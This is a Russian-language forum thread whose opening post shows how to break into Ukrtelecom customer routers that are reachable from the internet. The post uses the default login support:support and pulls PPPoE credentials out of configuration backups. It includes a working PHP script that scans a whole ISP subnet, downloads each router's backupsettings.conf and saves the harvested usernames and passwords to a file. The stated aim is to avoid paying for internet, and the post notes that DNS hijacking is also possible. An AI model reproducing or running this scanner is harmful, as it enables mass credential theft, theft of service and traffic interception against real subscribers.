Слыхали об роутерах от Укртелекома за 1 гривну? Тогда мы идём к вам!
Бувально пару часов назад я заметил, что роутеры Укртелекома доступны из сети и при заходе по их ip доступна панель управления роутером и telnet.
[Ссылки могут видеть только зарегистрированные пользователи. ]
Первой мыслью было одно — найти стандартный пароль для таких роутеров.
После минутного поиска цель была достигнута, логин: пароль — support:support.
Ввожу данные в форму и, как не странно, открывается web-панель управления:
[Ссылки могут видеть только зарегистрированные пользователи. ]
Дальнейшее действие — получить данные от PPPoE соединения: переходим в «Management» -> «Settings» -> «Backup» -> нажимаем «Backup settings». После этих действий в ваших руках оказывается XML-файл, в котором содержатся все настройки роутера, в ком числе логин и пароль от PPPoE.
Но на этом плюшки не заканчиваются! Следующая мысль — написать сканер подсети.
Пример кода ниже:
Код:
<?php
set_time_limit(0);
$access = 'support:support'; // логин:пароль
$one = '93.113'; // начало подсети (без точки)
function backup($ip, $access)
{
$curl = curl_init(); curl_setopt($curl, CURLOPT_URL, 'http://'.$ip.'/backupsettings.conf');
curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
// curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT_MS, 200);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERPWD, $access);
$buffer = curl_exec($curl); curl_close($curl);
if(!empty($buffer))
{
return simplexml_load_string($buffer)->InternetGatewayDevice->WANDevice->WANConnectionDevice->WANPPPConnection;
}
else return false;
}
for($a = 1; $a < 256; $a++){ // генерация цифер после второй точки
for($b = 1; $b < 256; $b++){ // генерация цифер после третьей точки
$file = backup($one.'.'.$a.'.'.$b, $access); // запрос к роутеру
if($file)
{
$save = fopen('login.txt', 'a+');
fwrite($save, $file->Username.':'.$file->Password."\n"); // запись в файл
fclose($save);
}
}
}
?>
Вот и всё, за интернет можно не платить. В роутере можно указывать свои DNS сервера, после чего злоумышленник получит контроль над всем трафиком.
________________
В любом из нас спит гений. И с каждым днем все крепче.
Запомните раз и навсегда:= 'Помочь' <> 'Сделайте за меня';
admin:admin стандартный пароль, раз 15 д3билам пароль на таких роутерах менял
________________
Принимаются пожертвования любых размеров в фонд поддержки начинающих программистов
Кошельки: WMZ - Z276844220882; WMR - R231028582939; WMU - U394136909210; ЯД - 410011494605270.
VeTaL_UA, не поверишь, у меня тоже пароль admin:admin. Но при этом стоит блокировка доступа неизвестных МАС'ов.
У меня аналогично
________________
Принимаются пожертвования любых размеров в фонд поддержки начинающих программистов
Кошельки: WMZ - Z276844220882; WMR - R231028582939; WMU - U394136909210; ЯД - 410011494605270.
еще распространены прошивки dd-wrt их можно ставить практически на любые роутеры
да и на дд-врт, на всех девайсах и любых прошивках пароль и логин admin
________________
1.Слабый-это не тот кто изначально в чём-то слабее кого-то , а тот кто смирился со своей слабостью
2.Счастье не в тех женщинах, с которыми хочется спать, а в тех, с которыми хочется просыпаться
3.Мир радовался твоему появлению на свет,а ты при этом плакал.Проживи жизнь так,чтобы мир плакал,когда ты,исполненный радости покинешь его.
4."Так вышло" - из этой фразы получился бы отличный эпиграф к любой человеческой жизни..
5.помог?ставь сяпку
6. Первое время у меня поживешь, а утром домой поедешь.